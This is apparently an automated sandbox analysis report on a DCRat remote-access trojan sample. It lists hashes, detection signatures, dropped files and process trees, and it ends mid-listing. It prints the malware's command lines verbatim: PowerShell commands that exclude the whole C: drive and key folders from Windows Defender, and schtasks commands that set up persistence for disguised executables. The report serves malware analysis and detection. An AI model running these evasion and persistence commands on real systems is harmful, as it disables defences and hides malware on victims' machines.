dcrat | 148d9ed52b15aa29e6a5d501cd575bd119039ffc2051b7ef47b33bce13dc8ec1

Analysis

max time kernel
151s
max time network
159s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
19-10-2022 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
Size

2.0MB
MD5

443880cbb37d23e8c3846e0b3c7f7358
SHA1

0824425675beced43463ee3943f745f4dd4f9110
SHA256

148d9ed52b15aa29e6a5d501cd575bd119039ffc2051b7ef47b33bce13dc8ec1
SHA512

5ca14e9a0ab251e30deb47383f20f8d288e34086bbf2e75438e6907e31e9128a49373dba29cedaef95e5cb228efdd69b39a4e14ef761b7d95dabd3b33ad0c766
SSDEEP

24576:CNhI4oUnscbH/4IhUaTkO4yMFBSPQh6PTntnjjgRGVDkkahscbqk9zDRXq6LYsU/:MXHw+UBT6Ld/9Ss8DxxL7dEMZ

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1076	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	300	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1168	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2012	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	624	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1408	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1832	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2000	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1504	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1616	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1592	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1564	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1548	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1836	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	664	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1700	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1948	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1928	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1060	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1256	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1664	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1448	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	908	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	700	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1796	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1076	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1652	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1156	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2068	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2096	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2120	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2144	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2168	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2212	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2240	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2268	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2312	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2360	824	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2388	824	schtasks.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/2044-55-0x000000001B9B0000-0x000000001BAB2000-memory.dmp	dcrat

Executes dropped EXE 3 IoCs

Processes:

tmp73AB.tmp.exelsm.exetmp5255.tmp.exe

pid process

952 tmp73AB.tmp.exe
2844 lsm.exe
2376 tmp5255.tmp.exe

pid	process
952	tmp73AB.tmp.exe
2844	lsm.exe
2376	tmp5255.tmp.exe

Loads dropped DLL 11 IoCs

Processes:

WerFault.exe148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exeWerFault.exe

pid	process
1576	WerFault.exe
1576	WerFault.exe
1576	WerFault.exe
1576	WerFault.exe
1576	WerFault.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2424	WerFault.exe
2424	WerFault.exe
2424	WerFault.exe
2424	WerFault.exe
2424	WerFault.exe

Drops file in Program Files directory 10 IoCs

Processes:

148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Defender\56085415360792	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files (x86)\Reference Assemblies\wininit.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files (x86)\Reference Assemblies\56085415360792	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files (x86)\Windows Defender\wininit.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files (x86)\Microsoft.NET\lsm.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files (x86)\Microsoft.NET\101b941d020240	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files\Windows Mail\WerFault.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files\Internet Explorer\it-IT\148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files\Internet Explorer\it-IT\834e73b3004aca	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Program Files\Windows Mail\ee201eac4591f0	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe

Drops file in Windows directory 10 IoCs

Processes:

148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe

description	ioc	process
File opened for modification	C:\Windows\IME\it-IT\WerFault.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\IME\it-IT\ee201eac4591f0	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\security\audit\ee201eac4591f0	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\tracing\cc11b995f2a76d	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\IME\it-IT\WerFault.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\diagnostics\system\Power\services.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\Setup\State\csrss.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\Setup\State\886983d96e3d3e	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\tracing\winlogon.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
File created	C:\Windows\security\audit\WerFault.exe	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1576 952 WerFault.exe tmp73AB.tmp.exe
2424 2376 WerFault.exe tmp5255.tmp.exe

pid	pid_target	process	target process
1576	952	WerFault.exe	tmp73AB.tmp.exe
2424	2376	WerFault.exe	tmp5255.tmp.exe

Creates scheduled task(s) 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
1832	schtasks.exe
2168	schtasks.exe
664	schtasks.exe
1928	schtasks.exe
1664	schtasks.exe
700	schtasks.exe
1076	schtasks.exe
2096	schtasks.exe
2012	schtasks.exe
1504	schtasks.exe
2292	schtasks.exe
2144	schtasks.exe
2240	schtasks.exe
1700	schtasks.exe
1060	schtasks.exe
1448	schtasks.exe
1156	schtasks.exe
2068	schtasks.exe
2268	schtasks.exe
1144	schtasks.exe
1836	schtasks.exe
2340	schtasks.exe
1804	schtasks.exe
1796	schtasks.exe
2212	schtasks.exe
1564	schtasks.exe
1948	schtasks.exe
2388	schtasks.exe
2000	schtasks.exe
1616	schtasks.exe
2032	schtasks.exe
1256	schtasks.exe
2120	schtasks.exe
2312	schtasks.exe
300	schtasks.exe
624	schtasks.exe
1764	schtasks.exe
1592	schtasks.exe
2192	schtasks.exe
1076	schtasks.exe
1168	schtasks.exe
1408	schtasks.exe
1548	schtasks.exe
908	schtasks.exe
1652	schtasks.exe
2360	schtasks.exe
1812	schtasks.exe
1944	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe

pid	process
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exelsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
Token: SeDebugPrivilege	2844	lsm.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe

Suspicious use of WriteProcessMemory 55 IoCs

Processes:

148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exetmp73AB.tmp.exelsm.exetmp5255.tmp.exe

description	pid	process	target process
PID 2044 wrote to memory of 952	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	tmp73AB.tmp.exe
PID 2044 wrote to memory of 952	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	tmp73AB.tmp.exe
PID 2044 wrote to memory of 952	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	tmp73AB.tmp.exe
PID 2044 wrote to memory of 952	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	tmp73AB.tmp.exe
PID 952 wrote to memory of 1576	952	tmp73AB.tmp.exe	WerFault.exe
PID 952 wrote to memory of 1576	952	tmp73AB.tmp.exe	WerFault.exe
PID 952 wrote to memory of 1576	952	tmp73AB.tmp.exe	WerFault.exe
PID 952 wrote to memory of 1576	952	tmp73AB.tmp.exe	WerFault.exe
PID 2044 wrote to memory of 2416	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2416	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2416	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2428	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2428	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2428	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2448	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2448	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2448	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2468	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2468	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2468	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2492	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2492	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2492	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2516	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2516	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2516	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2540	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2540	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2540	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2564	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2564	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2564	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2592	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2592	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2592	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2616	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2616	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2616	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2636	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2636	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2636	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2664	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2664	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2664	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	powershell.exe
PID 2044 wrote to memory of 2844	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	lsm.exe
PID 2044 wrote to memory of 2844	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	lsm.exe
PID 2044 wrote to memory of 2844	2044	148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe	lsm.exe
PID 2844 wrote to memory of 2376	2844	lsm.exe	tmp5255.tmp.exe
PID 2844 wrote to memory of 2376	2844	lsm.exe	tmp5255.tmp.exe
PID 2844 wrote to memory of 2376	2844	lsm.exe	tmp5255.tmp.exe
PID 2844 wrote to memory of 2376	2844	lsm.exe	tmp5255.tmp.exe
PID 2376 wrote to memory of 2424	2376	tmp5255.tmp.exe	WerFault.exe
PID 2376 wrote to memory of 2424	2376	tmp5255.tmp.exe	WerFault.exe
PID 2376 wrote to memory of 2424	2376	tmp5255.tmp.exe	WerFault.exe
PID 2376 wrote to memory of 2424	2376	tmp5255.tmp.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe
"C:\Users\Admin\AppData\Local\Temp\148D9ED52B15AA29E6A5D501CD575BD119039FFC2051B.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044

C:\Users\Admin\AppData\Local\Temp\tmp73AB.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp73AB.tmp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 44
3⤵
- Loads dropped DLL
- Program crash
PID:1576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
2⤵
PID:2664

C:\Program Files (x86)\Microsoft.NET\lsm.exe
"C:\Program Files (x86)\Microsoft.NET\lsm.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844

C:\Users\Admin\AppData\Local\Temp\tmp5255.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp5255.tmp.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 44
4⤵
- Loads dropped DLL
- Program crash
PID:2424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 14 /tr "'C:\Windows\IME\it-IT\WerFault.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\IME\it-IT\WerFault.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\it-IT\WerFault.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 9 /tr "'C:\Windows\security\audit\WerFault.exe'" /f
1⤵
- Process spawned unexpected child process
